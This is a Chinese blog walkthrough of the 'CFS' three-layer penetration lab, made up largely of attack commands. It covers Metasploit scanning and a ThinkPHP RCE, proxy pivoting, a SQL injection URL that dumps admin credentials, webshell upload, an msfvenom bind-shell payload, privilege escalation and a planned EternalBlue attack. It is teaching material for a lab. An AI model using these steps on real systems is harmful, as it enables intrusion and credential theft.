cfs_三层渗透之曲折之路

推荐参考这个https://blog.csdn.net/weixin_65575962/article/details/138675207?spm=1001.2014.3001.5501​​​​​​​y

代理工具用nps工具,msf的代理工具不稳定

利用msf工具

攻击机kali ip地址:192.168.23.129

信息收集

       主机发现:

       模块:auxiliary/scanner/discovery/arp_sweep

操作命令

       利用探测模块

              use auxiliary/scanner/discovery/arp_sweep

       查看参数

              show options

       设置探测网段RHOSTS

              set RHOSTS 192.168.23.0/24

       运行模块

              run

       返回探测结果

主机为1,2为网关,得到存活主机ip:192.168.23.141

目标机为:192.168.23.141

进一步探测进行端口扫描

模块:auxiliary/scanner/portscan/tcp

操作命令

       利用端口探测模块:

              use auxiliary/scanner/portscan/tcp

       查看参数:

              show options

       设置探测ip地址RHOSTS

              set RHOSTS 192.168.23.141

       运行模块

              run

       返回探测结果

             

去网页访问80端口

得到80端口的服务版本

       thinkphp攻击模块:exploit/unix/webapp/thinkphp_rce

操作命令             

利用模块:

              use exploit/unix/webapp/thinkphp_rce

       查看参数:      
              show options

       设置参数:

              set RHOSTS 192.168.23.141

              set LHOST 192.168.23.143

              set RPORT 80

       执行

              run

获取shell

       进入meterpreter 查看主机

查看ip

              发现有第二块网卡

进行内网穿透

模块:auxiliary/server/socks_proxy

设置srvhost和srvport 为kali的IP地址和端口

查看是否监听

进行路由转发: post/multi/manage/autoroute

设置好session后会自动添加路由

查看路由信息  route

然后打开proxychains的配置文件 /etc/proxychains4.conf  添加socks代理信息

因为msf中设置的socks版本是5,所以添加socks5:

代理配置完成扫描c段看看是否还存在存活主机过程略

发现存在192.168.22.129主机存活

访问192.168.22.129

返回网页反现提示sql注入点和cms版本信息

用GOOGLE浏览器设置代理

访问192.168.22.129

进行sqlmap爆破

http://192.168.22.129/index.php?r=vul&keyword=1%27%20union%20select%20group_concat(username),group_concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%20from%20bage_admin%23

解密登陆后台

http://192.168.22.129/index.php?r=admini/public/login后台地址(御剑扫出)

admin

123qwe

得到flag

写入一句话木马

配置蚁剑代理

连接

获取flag

继续传马在msf拿shell,不过目标是在192.168.22.0网段,主动连我们肯定是连不上的,所以这里需要正向连,msf去连它

生成正向后门木马为

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > 3.elf

通过蚁剑上传到目标机上更改权限为0777

打开窗口执行3.elf文件

(执行前)启用监听

use exploit/multi/handler

设置payload

set payload linux/x64/meterpreter/bind_tcp

set RHOST 192.168.22.129

设置监听端口

3333

启用监听

exploit

成功登入查看版本

发现新的ip

获取网络接口:run get_local_subnets

添加路由地址:run autoroute -s 192.168.33.0/24

查看路由地址:run autoroute -p

由于以上连接不稳定更改代理工具,重新进行渗透

配置nps工具

mkdir -p /nps/server  #创建多级目录

cd /nps/server

#下载到server目录下并解压

wget https://github.com/ehang-io/nps/releases/download/v0.26.9/linux_386_server.tar.gz

tar -zxvf linux_386_server.tar.gz

#解压后会含有一下目录及文件

# conf  nps  web

下载完服务器压缩包后,解压,然后进入解压后的文件夹

执行安装命令

./nps install

配置文件在 /etc/nps/conf/nps.conf ,只需要修改下面的webhost、账号、密码和端口号即可,其他可保持不变

admin

123

8088(端口号)

启动nps

nps start

参考文档

NPS内网穿透安装配置_nps官方文档-CSDN博客

重新进行渗透对每个靶机上传客户端nps发现没有权限执行

Target1进行提权

save保存设置的参数

post/multi/recon/local_exploit_suggester模块查找可利用session提权

可提权

设置参数

角色为root提权成功

Flag

部署代理

交互命令

python -c 'import pty;pty.spawn("/bin/bash")'

上传nps客户端解压安装

执行命令

开启

页面

开新窗口

Kali的流量会通过代理1流向靶机2

获取2的root过程同上

还是利用multi/recon/local_exploit_suggester通过sessio获取root

       未能获取权限

挂代理添加路由同上

访问192.168.33.128

能通

进行同段扫描

Target3

尝试扫描33网段

proxychains4 nmap -Pn -sT 192.168.33.33

发现开放着3389,445端口等这是windows系统利用永恒之蓝

这里nps不成功重新安装kali ip为192.168.23.143利用proxychains4 socks5进行代理

重新添加

用multi/recon/local_exploit_suggester利用sessio 2进行查找提权

发现用liunx2023.3版本可以查找出提权模块

利用exploit/linux/local/cve_2021_3493_overlayfs提权payload失败

略过提权进行渗透对windows渗透可以ping通

进行永恒之蓝渗透

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值